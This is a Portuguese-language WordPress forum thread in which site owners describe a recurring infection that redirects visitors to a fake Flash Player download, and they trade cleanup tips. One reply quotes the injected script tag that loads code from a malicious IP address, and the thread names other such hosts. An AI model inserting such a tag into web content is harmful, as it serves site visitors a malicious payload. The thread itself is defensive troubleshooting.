Aparentemente estou com o mesmo problema, redireciona por exemplo: http://87.106.35.192/br/flashplayer/download/
Versão do meu WordPress: 3.3.1
Criador do tópico
over12
(@over12)
Esse mesmo, o disgramado coloca um script no titulo do Post, a solução que encontrei é manualmente acesso a area de posts e mando procurar pelo IP ai deleto manualmente, mas a questão por onde que ele esta acessando…
Pessoal tive que resolver um problema extamente com este, ainda não descobri a fonte e nao tem muita informação sobre este problema parece ser um malware novinho. Acredito que ele altera o arquivo .htaccess.
Eu coloquei a permissão 444 para o .htaccess para somente permitir leitura até agora parece que resolveu, mas de qualquer forma tem que achar a fonte desta praga.
Criador do tópico
over12
(@over12)
Opá obrigado pela Dica, já mudei o chmod do meu aqui.. 😛
Outro remédio para impedir o bug causado pela praga é inserir este codigo no wp-config.php
define( ‘DISALLOW_UNFILTERED_HTML’, true );
Mas de qualquer forma mesmo resolvendo o but, temos que continuar tentando achar a fonte.
Olá pessoal, estou com o mesmo problema. Alem da pagina inicial (index.php) também o script aparece num widgets, ele cria um novo texto num widgets ativo.
Já é a segunda vez que excluo. Vamos ver se volta.
Criador do tópico
over12
(@over12)
Bom o meu não volto…
Usei as dicas do Mateus e até o momento estou sem dor de cabeça!
Eu tento alterar as permissões mais volta para a que estava.
Olá,
Voltou sim, no domingo eu achei o danado no mesmo widgets, mas na index.php não tinha nada….
Estranho demais.
Eu até tentei alterar a permissão para 444 conforme o colega acima falou, mas não consegui pois esse site está hospedado no Uol Host e não achei como mudar isso, coisa que faço facil facil no Cpanel da minha revenda.
Criador do tópico
over12
(@over12)
Eu também estava feliz que não tinha voltado…
Porém hoje (08/05) o disgramado voltou…..
Estou com esse problema desde o começo de 2013. Já fiz de tudo e ele sempre volta, cada hora com um script diferente. Estou muito preocupado, parece um problema sem fim!
Cada hora ele ataca um arquivo diferente, já foi na index, wp-config, blog-header, vários arquivos do meu template e também em widgets.
Preciso de ajuda!
Já existe vários tópicos com a solução para este virus.
Dê uma consultada abaixo.
Veja aqui o Tópico
Veja aqui outro Tópico
Entre na raiz do wordpress, apague qualquer página que não seja do wp, em seguida abra a pagina index.php do seu tema, procure por este script no início da página – <script src=”http://50.22.91.159/br/flashplayer/”></script> ou parecido, DELETE, substitua as paginas, e pronto, aqui resolveu, porem meu problema estava na pesquisa, quando se pesquisava algum produto o site era redirecionado para uma página falsa do flash, isto estava tambem nos widgets de busca, não sei se o problema foi resolvido de uma vez por todas ou se pode voltar, mude tambem as senhas de ftp e da administração do wp.
fiz o download do banco de dados pelo phpmyadmin, abri no Dreamweaver, e procurei pelo endereço que fui redirecionado e encontrei, tinha 3 ou 4 scripts com os endereços ao qual meu site era redirecionado, deletei os scripts no próprio Dreamweaver, entrei no banco de dados e LIMPEI as TABELAS nao EXCLUI, depois eu importei novamente sem os scripts, alterei as senhas novamente, ate agora resolveu